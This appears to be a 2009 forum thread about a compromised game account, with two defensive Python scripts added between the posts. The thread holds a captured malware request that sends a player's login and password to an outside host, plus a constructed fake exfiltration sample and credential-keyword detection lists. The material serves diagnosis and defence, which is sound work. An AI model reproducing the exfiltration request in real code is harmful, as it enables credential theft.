Packet sniffer and a compromised account

#0 - Dec. 6, 2009, 10:25 p.m.
Blizzard Post
Recently my wow account was compromised. The PC has always had an AV installed, patched, no warez, etc. I took a look with several AV tools and rootkit tools (Icesword, GMER) and couldn't turn anything up. I finally found something interesting after installing a packet sniffer tool and thought I would share the results I found. I would also appreciate any feedback since I'm not a computer security expert.

Using smartsniff... After successful login the following packet was sent to an IP address owned by a Texas ISP (as opposed to the packets sent to Blizzard owned locations):

GET /wow/[email protected]&pw=password123&s1=us&rm=0&s2=Nesingwary&Appe=7-XP&rl=1&rn=Caylbouris HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Host: suomali.<redacted>.info
Connection: Keep-Alive

whois indicates the host is registered through godaddy.com with most of the information hidden.

Any chance someone can confirm that this is a rogue transmission? I haven't had time to try it on a clean box yet.

Monitoring the wow.exe process with Socketsniff indicates that the packets are originating from the wow process.

I'm not sure what to make of this. Obviously I haven't been installing .exe addons or wow hacks/cheats. This seems to indicate the security breach is limited to wow as opposed to a system-wide problem. Comments?

My only theory on the PC compromise is that it was sitting without a HW firewall (actually in a DMZ) for the past year because I completely screwed up the router config (actually I was trying some stuff out and forgot to reset it to something secure).
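The capture above was triaged by hand: the poster noticed credential-shaped parameters (a username, a password, the realm and character name) in a plaintext GET query string going to a host that is not Blizzard's. The following Python script is an added example, not code from the thread or from any of the tools named in it, that automates that same check over a raw HTTP request. The domain allowlist, the sensitive parameter names, and the sample request (the path, the `.invalid` host and the `hunter2` password are all constructed placeholders) are assumptions for the example.

```python
from urllib.parse import urlsplit, parse_qs

# Assumption for this example: domains the game client is expected to talk to.
EXPECTED_DOMAIN_SUFFIXES = ("blizzard.com", "battle.net", "worldofwarcraft.com")

# Query parameter names that should never travel in a plaintext GET request.
CREDENTIAL_PARAMS = {"pw", "pass", "password", "passwd",
                     "user", "username", "login", "email"}


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request (request line plus headers) into its parts."""
    lines = raw.strip().splitlines()
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():          # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def host_is_expected(host: str) -> bool:
    """True if the Host header names an allowlisted domain or one of its subdomains."""
    host = host.lower().split(":")[0]     # drop an explicit port if present
    return any(host == s or host.endswith("." + s) for s in EXPECTED_DOMAIN_SUFFIXES)


def triage(raw: str) -> dict:
    """Flag credential-like query parameters and unexpected destination hosts."""
    req = parse_request(raw)
    parts = urlsplit(req["target"])
    query = parse_qs(parts.query, keep_blank_values=True)
    leaked = sorted(k for k in query if k.lower() in CREDENTIAL_PARAMS)
    host = req["headers"].get("host", "")
    findings = []
    if leaked:
        findings.append("credential-like parameters in plaintext query string: "
                        + ", ".join(leaked))
    if not host_is_expected(host):
        findings.append(f"destination host {host!r} is outside the expected domain list")
    return {"host": host, "path": parts.path, "leaked_params": leaked, "findings": findings}


# Constructed sample modelled on the shape of the captured request; every value is made up.
SUSPICIOUS_REQUEST = """GET /wow/collect.php?user=player%40example.com&pw=hunter2&s1=us&rm=0&s2=Nesingwary&rl=1&rn=Caylbouris HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Host: collector.example.invalid
Connection: Keep-Alive
"""

# Constructed benign request to an allowlisted host with no credentials in the query.
BENIGN_REQUEST = """GET /patch/notes?locale=en_US HTTP/1.1
Host: us.battle.net
Connection: Keep-Alive
"""

if __name__ == "__main__":
    for label, raw in (("suspicious", SUSPICIOUS_REQUEST), ("benign", BENIGN_REQUEST)):
        result = triage(raw)
        print(label, "->", result["host"], result["path"], result["findings"] or "no findings")
```

A request is worth escalating when either finding fires; both firing together, as in the constructed sample, matches the pattern the poster described. The allowlist only covers the Host header the client chose to send, so it supplements rather than replaces checking the destination IP's owner with whois.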
#2 - Dec. 6, 2009, 11:22 p.m.
Blizzard Post
Hello Galloway

Can you fill out the form here:
http://us.blizzard.com/support/article.xml?locale=en_US&tag=hacksform

And use it to alert our hacks team with this information.

If you have any files you want to send them please follow the instructions at the bottom of that page and send them to [email protected]

You may want to try moving the wow.exe outside of your World of Warcraft folder, then run the repair utility and then try the game once it replaces the wow.exe.

Use the one we have here:
http://ftp.blizzard.com/pub/WoW/other/Repair.zip

You may also want to check the hosts files on your system.

1) Click on Start then Search or Find files and folders to search your hard drive for a specific file.
2) In the file name field, type the word "hosts" (without the quotes) and search for that file.
3) Once Windows has found the file(s), you may want to make a backup copy and name it hosts.bak.
4) Double-click the hosts file (not the backup) and choose to open it using Notepad.
5) The term ".battle.net and warcraft" should not appear anywhere in this document.
6) If you see any entries like this please delete them.
7) Close the Notepad document and choose Yes when it asks you if you want to save the changes.
8) Repeat the steps above for each hosts file you find on the hard drive. No hosts file should include any information about Battle.net or warcraft.
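The eight manual steps above (find each hosts file, back it up as hosts.bak, remove any entry mentioning battle.net or warcraft, save) can be carried out by a short script. The Python below is an added example and not code from Blizzard or from the thread; it parses hosts-file text, reports the offending entries, and writes a cleaned copy after saving a `.bak` backup. The sample hosts text is constructed, the match pattern follows the wording of step 5, and the default path is the usual location of the Windows hosts file.

```python
import re
from pathlib import Path

# Step 5 of the procedure: no entry should mention battle.net or warcraft.
SUSPECT_PATTERN = re.compile(r"battle\.net|warcraft", re.IGNORECASE)

# Usual location of the Windows hosts file (the procedure says to check every copy found).
DEFAULT_HOSTS_PATH = r"C:\Windows\System32\drivers\etc\hosts"


def parse_hosts(text: str) -> list:
    """Return (line_no, ip, hostnames, raw_line) for every non-comment, non-blank entry."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        stripped = raw.split("#", 1)[0].strip()   # drop comments, including trailing ones
        if not stripped:
            continue
        parts = stripped.split()
        entries.append((n, parts[0], parts[1:], raw))
    return entries


def find_suspect_entries(text: str) -> list:
    """Entries whose hostnames match the suspect pattern (steps 5 and 6)."""
    return [e for e in parse_hosts(text)
            if any(SUSPECT_PATTERN.search(h) for h in e[2])]


def clean_hosts(text: str) -> str:
    """Hosts text with the suspect lines removed; everything else is kept verbatim."""
    bad = {e[0] for e in find_suspect_entries(text)}
    kept = [line for n, line in enumerate(text.splitlines(), 1) if n not in bad]
    return "\n".join(kept) + ("\n" if text.endswith("\n") else "")


def check_and_clean_file(path: str = DEFAULT_HOSTS_PATH) -> list:
    """Steps 3, 6 and 7: back up the file as <name>.bak, then write back a cleaned copy.

    Returns the removed entries so the caller can see what was there.
    """
    p = Path(path)
    text = p.read_text(encoding="utf-8", errors="replace")
    suspects = find_suspect_entries(text)
    if suspects:
        p.with_name(p.name + ".bak").write_text(text, encoding="utf-8")
        p.write_text(clean_hosts(text), encoding="utf-8")
    return suspects


# Constructed sample: two redirected game hostnames mixed with legitimate entries.
SAMPLE_HOSTS = """# constructed sample hosts file
127.0.0.1       localhost
203.0.113.10    us.logon.battle.net   # redirects the login server
203.0.113.10    www.worldofwarcraft.com
192.0.2.5       intranet.example.org
"""

if __name__ == "__main__":
    for line_no, ip, names, _ in find_suspect_entries(SAMPLE_HOSTS):
        print(f"line {line_no}: {ip} -> {' '.join(names)}")
    print(clean_hosts(SAMPLE_HOSTS))
```

Run `check_and_clean_file()` from an elevated prompt for each hosts file found in step 1; the function leaves the file untouched when nothing matches, so it is safe to run on a clean machine. Redirecting a login hostname to an attacker-controlled address is what makes a hosts-file entry for these domains worth removing.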